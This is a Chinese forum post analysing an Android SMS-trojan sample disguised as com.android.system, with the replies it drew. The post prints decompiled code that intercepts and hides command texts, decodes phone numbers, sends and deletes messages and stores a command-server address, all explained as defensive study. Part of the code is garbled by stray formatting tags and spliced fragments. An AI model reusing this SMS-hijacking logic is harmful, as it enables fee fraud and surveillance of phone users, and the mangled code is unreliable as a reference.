apk病毒样本分析

apxar · 发表于 2014-4-20 08:40

一.基本信息

文件名称：Update.apk

MD5：396ecd933e52403c645c1241de501696

Sha-1：29051ca16672b9cb2b5940cc2e0d8feeb6a51262

应用名称：Audience

文件包名：com.android.system

二.AndroidManifest.xml

[Asm] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

      <receiver android:label="@string/app_name" android:name=".Audiencer">
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.intent.action.NEW_OUTGOING_CALL" />
                <action android:name="android.intent.action.SCREEN_OFF" />
                <action android:name="android.intent.action.SCREEN_ON" />
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>
        <service android:name=".Audience" />//启动的服务
    </application>
    <uses-permission android:name="android.permission.INTERNET" />//联网 
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />//访问网络状态
    <uses-permission android:name="android.permission.WRITE_APN_SETTINGS" />//改写APN设置
    <uses-permission android:name="android.permission.WRITE_APN_SETTING" />
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />//访问wifi
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />//开机开启广播
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />//读信息
    <uses-permission android:name="android.permission.WRITE_SMS" />//写信息
    <uses-permission android:name="android.permission.SEND_SMS" />//发信息
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" />//监视，修改有关拨出电话
    <uses-permission android:name="android.permission.WAKE_LOCK" />//手机屏幕关闭后后台进程仍然运行
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />//挂载、反挂载外部文件系统
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />//写sd卡
    <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" />
    <uses-permission android:name="android.permission.READ_LOGS" />//读取系统日志
    <uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES" />//关闭后台程序
    <uses-permission android:name="android.permission.RESTART_PACKAGES" />//重启程序
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />//读取电话状态
</manifest>

三.分析

1）

安装完后，重新开机，验证其具有开机启动，启动对象为.Audiencer,伪装包名为:com.android.system

同时具有：屏幕关闭时启动服务,监控短信（收到短信）启动服务

2）BroadcastReceiver：Audiencer

[Asm] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

public void onReceive(Context paramContext, Intent paramIntent)
  {
    int i = 0;
    Log.e(Audiencer.class.getSimpleName(), paramIntent.getAction());
    if (this.a == null)
    {
      this.a = new Intent();
      this.a.setClass(paramContext, Audience.class);//启动 Audience服务
    }
    if ("android.provider.Telephony.SMS_RECEIVED".equals(paramIntent.getAction()))//当接受到短信时
    {
      Object[] arrayOfObject = (Object[])paramIntent.getExtras().get("pdus");
      SmsMessage[] arrayOfSmsMessage;
      if ((arrayOfObject != null) && (arrayOfObject.length > 0))
        arrayOfSmsMessage = new SmsMessage[arrayOfObject.length];
      for (int j = 0; ; j++)
      {
        if (j >= arrayOfObject.length)
        {
          int k = arrayOfSmsMessage.length;
          if (i < k)
            break;
          return;
        }
        arrayOfSmsMessage[j] = SmsMessage.createFromPdu((byte[])arrayOfObject[j]);
      }
      SmsMessage localSmsMessage = arrayOfSmsMessage[i];
      String str1 = localSmsMessage.getMessageBody();
      String str2 = localSmsMessage.getOriginatingAddress();
      if (str1.startsWith("ch:"))//监听 拦截短信内容以 “ch:”开始的短信，获得网址，写入数据库
      {
        Audience.e().a(str1.substring(3));
        abortBroadcast();
        return;
      }
      if (str1.startsWith("pr:"))//拦截短信内容以 “pr:” 开始的短信，记录mobile号码
      {
        Audience.e().b(str1.substring(3));[/size][/font][/color][font=宋体][color=#000000][size=11.818181991577148px]//记录接受到每1位mobile号，写入HashMap中，最后写入数据库[/size][/color][/font][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]abortBroadcast();[/size][/font][/color][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]return;[/size][/font][/color][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]}[/size][/color][/font][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]Audience.e().c().a("SmsReceiver   mobile:" + str2 + "  content:" + str1);[/size][/font][/color][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]if (Audience.e().k().a(str2, str1, null))//str2为电话号码，str1为信息内容[/size][/font][/color][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]{[/size][/font][/color][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]System.out.println("need response");[/size][/font][/color][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]Audience.e().k().b(str1);//str1为信息内容[/size][/color][/font][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]switch (Audience.e().k().a().g())[/size][/font][/color][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]{[/size][/font][/color][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        case 3:[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        default:[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        case 0:[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        case 1:[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        case 2:[/size][/color][/font][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]}[/size][/font][/color][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]}[/size][/font][/color][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      while (true)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      {[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        i++;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        break;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        abortBroadcast();[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        abortBroadcast();[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        abortBroadcast();[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        if (!Audience.e().k().a().a(str2, str1))[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]          continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        a.a.f.a(Audience.e().k().a().a(str2), Audience.e().k().a(str1));//发送信息[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      }[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]    }[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]    Log.e("Process", "service is:" + Audience.e());[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]    if (Audience.e() != null)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      if ("android.intent.action.SCREEN_ON".equals(paramIntent.getAction()))//屏幕打开时[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        Log.e("Receiver", "Screen_ON");[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]    while (true)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]    {[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      try[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      {[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        Audience.e().o();[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      }[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      catch (Exception localException1)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      {[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        try[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        {[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]          if (!Audience.a)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]            continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]          Audience.e().m();[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]          if (Audience.a)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]            break;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]          Log.e("Process", "Start Service By Dial Or Start up");[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]          paramContext.startService(this.a);[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]          return;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]          localException1 = localException1;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]          localException1.printStackTrace();[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]          continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        }[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        catch (Exception localException2)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        {[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]          localException2.printStackTrace();[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]          continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        }[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      }[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      if (!"android.intent.action.SCREEN_OFF".equals(paramIntent.getAction()))//屏幕关闭时[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      Log.e("Receiver", "Screen_OFF");[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      if (Audience.a)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      {[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        paramContext.startService(this.a);//屏幕关闭时，启动服务[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        Log.e("Process", "Start Service");[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      }[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      Audience.e().l();[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      if (!Audience.a)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]        continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      Log.e("Process", "Start Service By Dial Or Start up");[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]      paramContext.startService(this.a);[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]    }[/size][/color][/font][/align]
[align=left][font=宋体][color=#000000][size=11.818181991577148px]  }[/size][/color][/font][/align][align=left]
[color=black][/color][/align][align=left][color=black][/color][/align][align=left][color=black][font=宋体][size=9pt]      {

3）拦截信息，获取记录接受到每1位mobile号

[Asm] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

public final void b(String paramString)//记录接受到每1位mobile号
                                        {
                                            StringBuffer localStringBuffer = new StringBuffer();
                                            int i1 = 0;
                                            if (i1 >= paramString.length())
                                            {
                                             c(localStringBuffer.toString());
                                              
                                             
                                              
                                              
                                              
                                              
                                            return;
                                            }
                                            int i2 = paramString.charAt(i1);
                                            if (i2 == 97)
                                            localStringBuffer.append('0');
                                            while (true)
                                            {
                                            i1++;
                                            break;
                                            if (i2 == 98)
                                            {
                                                localStringBuffer.append('1');
                                                continue;
                                            }
                                            if (i2 == 99)
                                            {
                                                localStringBuffer.append('2');
                                                continue;
                                            }
                                            if (i2 == 100)
                                            {
                                                localStringBuffer.append('3');
                                                continue;
                                            }
                                            if (i2 == 101)
                                            {
                                                localStringBuffer.append('4');
                                                continue;
                                            }
                                            if (i2 == 102)
                                            {
                                                localStringBuffer.append('5');
                                             continue;
                                            }
                                            if (i2 == 103)[mw_shl_code=asm,true]public final void b(String paramString)//paramString为信息内容
                                {
                                    Log.e("waitForSmsJob", this.c);
                                    if (this.c != null)
                                    {
                                    if ((this.a.l() == null) || (this.a.l().trim().length() == 0))
                                        this.c.a(this.d);
                                    }
                                    else
                                    return;
                                 this.c.a(c(paramString));//j.a(c(paramString))////paramString为信息内容,//等待接收消息，对信息内容处理
                                  
                                 
                                  
                                }

      {
        localStringBuffer.append('6');
        continue;
      }
      if (i2 == 104)
      {
      localStringBuffer.append('7');
        continue;
      }
      if (i2 == 105)
{
        localStringBuffer.append('8');
        continue;
      }
      if (i2 != 106)
        continue;
      localStringBuffer.append('9');
}[/mw_shl_code]

3）对接收到的命令信息执行：

[Asm] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

public final void b(String paramString)//paramString为信息内容
                                {
                                    Log.e("waitForSmsJob", this.c);
                                    if (this.c != null)
                                    {
                                    if ((this.a.l() == null) || (this.a.l().trim().length() == 0))
                                        this.c.a(this.d);
                                    }
                                    else
                                    return;
                                 this.c.a(c(paramString));//j.a(c(paramString))////paramString为信息内容,//等待接收消息，对信息内容处理
                                  
                                 
                                  
                                }

4）数据库Audience.db进行信息记录

[Asm] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

public final void onCreate(SQLiteDatabase paramSQLiteDatabase)
 {
   a("DBOpenHelper   onCreate");
   try
   {
     paramSQLiteDatabase.execSQL("CREATE TABLE IF NOT EXISTS sysapp (_id integer primary key, config varchar (2048))");
     this.b.put("next_work_time", Audience.e().j());
     this.b.put("next_work_time2", "86400");
     Map localMap = this.b;
     Random localRandom = new Random();
     StringBuffer localStringBuffer1 = new StringBuffer("");
     int i = 0;
     ContentValues localContentValues;
     StringBuffer localStringBuffer2;
     Iterator localIterator;
     if (i >= 18)
     {
       localMap.put("pid", localStringBuffer1.toString());//各种响应回复命令
       this.b.put("response_to_who", "");
       this.b.put("reply_response_to_who", "");
       this.b.put("reply_response_to_what", "");
       this.b.put("response_type", "3");
       this.b.put("remain_time", "0");
       this.b.put("mobile", "");
       this.b.put("start_time", "0");
       this.b.put("response_to_what", "");
       this.b.put("change_to_who", "");
       this.b.put("change_to_what", "");
       this.b.put("reply_who", "");
       this.b.put("reply_what", "");
       this.b.put("content_cutter", "");
       this.b.put("heart_beat", "0");
       this.b.put("heart_beat_last_work", "0");
       this.b.put("heart_beat_last_work2", "0");
       this.b.put("heart_beat_start_block", "0");
       this.b.put("fee_host", "post://g.kong-mobile.com:8000/g");
       this.b.put("work_count", "0");
       this.b.put("phs", "YLsLcpcCe/qnwGUFzsr1vqeJqOUyka1A8WL4ZxiyNcOkgpVRFz9gC2UqVBCL K6Q5DQUSoGYjikdAqMlU9btuXnN2sDCAo6vugMP9PTHnEFNb2egaNqWvmj95 y2DagjgP96SxsoOC3mCtXV29EJ7GaIkeBx3klqrZ0jgQgqWyRYVE5HvsXBRo Y/Jp9H3u8oBh1Tcb6JD+Sd423xm6PKnkobISdYPR/pQEW8nOh8LRy/Qhfvev xcHAPmzcWngvxCP3sJl3HtIDgltBjXtN1ehMLSgyP7HOsx9kGaYZBIx9zHh5 rYsjR2s5Uu+ljB1Hd3X+VxL+nYIA8g1QD/mcOcUUC3sPgiCeQo+q/Z1p/XbH Sd4fUidWEbEXtH3fbyrYQEZZUq5t6QAaganu3qiDqefSaFJuTDJOoWnFwGPV 36sl3NSY1QOamu9cVaBOv+yT8d7XxmQuCjoDBCQl6Py5y/MHGl+wQSdkxIX4 X+bkUS2GKFvoF+dYyMGIr5pxSqBbnFjZ");
       localContentValues = new ContentValues();
       localContentValues.put("_id", Integer.valueOf(1));
       localStringBuffer2 = new StringBuffer();
       localIterator = this.b.entrySet().iterator();
     }
     while (true)
     {
       if (!localIterator.hasNext())
       {
         localContentValues.put("config", localStringBuffer2.toString());
         paramSQLiteDatabase.insert("sysapp", null, localContentValues);
         a("DBOpenHelper.onCreate   " + localStringBuffer2.toString());
         return;
         localStringBuffer1.append(localRandom.nextInt(10));
         i++;
         break;
       }
       Map.Entry localEntry = (Map.Entry)localIterator.next();
       if (localStringBuffer2.length() != 0)
         localStringBuffer2.append("[P]");
       localStringBuffer2.append((String)localEntry.getKey()).append("[=]").append((String)localEntry.getValue());
     }
   }
   catch (Exception localException)
   {
     a("DBOpenHelper.onCreate   " + localException.toString());
   }
 }

对应数据库表sysapp记录各种操作信息：

next_work_time2[=]86400[P]response_to_what[=][P]work_count[=]2[P]reply_response_to_who[=][P]heart_beat_start_block[=]0[P]reply_response_to_what[=][P]pid[=]880085661072784632[P]heart_beat[=]374[P]remain_time[=]0[P]response_to_who[=][P]next_work_time[=]180[P]heart_beat_last_work[=]374[P]fee_host[=]post://g.kong-mobile.com:8000/g[P]content_cutter[=][P]response_type[=]3[P]phs[=]YLsLcpcCe/qnwGUFzsr1vqeJqOUyka1A8WL4ZxiyNcOkgpVRFz9gC2UqVBCL K6Q5DQUSoGYjikdAqMlU9btuXnN2sDCAo6vugMP9PTHnEFNb2egaNqWvmj95 y2DagjgP96SxsoOC3mCtXV29EJ7GaIkeBx3klqrZ0jgQgqWyRYVE5HvsXBRo Y/Jp9H3u8oBh1Tcb6JD+Sd423xm6PKnkobISdYPR/pQEW8nOh8LRy/Qhfvev xcHAPmzcWngvxCP3sJl3HtIDgltBjXtN1ehMLSgyP7HOsx9kGaYZBIx9zHh5 rYsjR2s5Uu+ljB1Hd3X+VxL+nYIA8g1QD/mcOcUUC3sPgiCeQo+q/Z1p/XbH Sd4fUidWEbEXtH3fbyrYQEZZUq5t6QAaganu3qiDqefSaFJuTDJOoWnFwGPV 36sl3NSY1QOamu9cVaBOv+yT8d7XxmQuCjoDBCQl6Py5y/MHGl+wQSdkxIX4 X+bkUS2GKFvoF+dYyMGIr5pxSqBbnFjZ[P]change_to_who[=][P]reply_what[=][P]reply_who[=][P]change_to_what[=][P]heart_beat_last_work2[=]0[P]start_time[=]0[P]mobile[=]

5）模块a/a/f有对信息的修改，删除操作等：

paramContentResolver.delete(Uri.parse("content://sms"), " _id = " + paramInt, null);

paramContentResolver.update(Uri.parse("content://sms"), localContentValues, " _id = " + paramInt, null);

6）a/b/b模块具有联网，以cookies形式上传信息操作

setRequestProperty("Cookie", localStringBuffer.toString());

简单分析，大牛勿喷

宿命棋局 · 发表于 2014-4-20 08:53

不错，吾爱有你更精彩

血染de枫彩 · 发表于 2014-4-20 09:06

学习了感谢分享经验

OllyDbg丶 · 发表于 2014-4-20 09:12

谢谢楼主分享技术分析，我受益匪浅

stain · 发表于 2014-4-20 09:18

安卓的病毒就是多

假好人。 · 发表于 2014-4-20 09:29

大神膜拜

apxar · 发表于 2014-4-20 16:10

宿命棋局发表于 2014-4-20 08:53
不错，吾爱有你更精彩

谢谢。。。。。。。。。

nod · 发表于 2014-4-21 10:36

还利用安卓的漏洞隐藏了在应用程序里面的包

寂留 · 发表于 2014-4-23 21:52

我的手机就会莫名其妙的发短信

Thend · 发表于 2014-8-4 14:02

学习学习。。。

帐号		自动登录	找回密码
密码			注册[Register]

[移动样本分析] apk病毒样本分析

免费评分